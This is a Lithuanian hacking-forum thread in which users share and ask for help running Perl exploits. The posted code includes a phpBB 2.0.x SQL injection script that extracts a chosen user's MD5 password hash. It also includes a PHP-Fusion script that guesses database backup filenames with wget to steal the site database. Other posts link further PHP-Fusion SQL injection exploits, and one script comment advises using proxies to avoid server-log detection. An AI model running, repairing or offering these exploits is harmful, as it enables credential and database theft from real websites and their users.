Exploit
Mokinuosi PHP, tik vat jau 3 valandas sėdžiu ir niekaip negaliu nromalei paleisti Apache.. trumpiau sakant nesamone.. Tai rodo Unable to find logs, paskui rodo kad neranda Servissu.. Nesąmonė krč.. kaip ji po velniu paleisti..GODhack rašė:Arba mokinkis kas tas php yra arba ir toliau leisk per perla.
trumpiau sakant, o gal yra koks exploitas perlui, kad php fusion vartotojo hash gauti?
Reikia pagalbos.. Štai exploitas phpBB forumui, viskas čiki veikia, bet tai krč nerodo hash'o. Rodo finished bet hash nerodo.. Kodėl?
#!/usr/bin/perl
print q{
_________________________________________________________________________
# Exploit: All Topics Hack Sql injection
# For: phpBB ( 2.0.x - 2.0.21 )
_________________________________________________________________________
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
# milw0rm.com [2006-08-23]
Naudok 6.00.306 versijai. O jie yra 2:
PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit:
http://www.milw0rm.com/exploits/1796
PHP-Fusion <= 6.00.306 Multiple Vulnerabilities Exploit:
http://www.milw0rm.com/exploits/1760
PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit:
http://www.milw0rm.com/exploits/1796
PHP-Fusion <= 6.00.306 Multiple Vulnerabilities Exploit:
http://www.milw0rm.com/exploits/1760
Su šituo irgi problema. šitas turi išplėšti DB iš saito, bet kai viską suvedu rodo kažkoki ensibaigianti užrašą... Help..
#!/usr/bin/perl
###########################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
###########################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
###########################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
###########################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
###########################
# 9999 requests to the host is alot, And would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
# backup the php-fusiondatabase.
my $wget='wget';
my $count='0';
my $target;
if (@ARGV < 4)
{
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
print "\n";
exit();
}
my $host = $ARGV[0];
my $ver = $ARGV[1];
my $file = $ARGV[2];
my $extension = $ARGV[3];
if ($ver eq "6") {
$dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
}
if ($ver eq "5") {
$dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Host: $host\n";
print "Directory: $dir\n";
print "File: $file + 0001 to 9999\n";
print "Extension: $extension\n";
print "\n";
print "Attempting to find a db backup file on $host\n";
for($count=0;$count<9999;$count++) {
$target=$host.$dir.$file.sprintf("%04d", $count).$extension;
system("$wget $target");
}
Dabar prisijungę
Vartotojai naršantys šį forumą: 2 ir 0 svečių